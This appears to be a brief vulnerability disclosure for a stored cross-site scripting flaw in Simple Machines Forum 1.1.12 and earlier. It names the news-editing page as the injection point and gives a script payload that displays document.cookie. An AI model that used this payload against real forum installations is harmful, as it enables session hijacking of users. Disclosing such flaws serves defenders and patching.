XSS (Persistent)Simple Machines Forum <= 1.1.12
# Tested on: Linux/Windows
[POC]
The attacker must have access to
http://localhost/smf/index.php?action=news;sa=editnews
code and simply paste a code like the following
<script>alert(document.cookie);</script>
No comments:
Post a Comment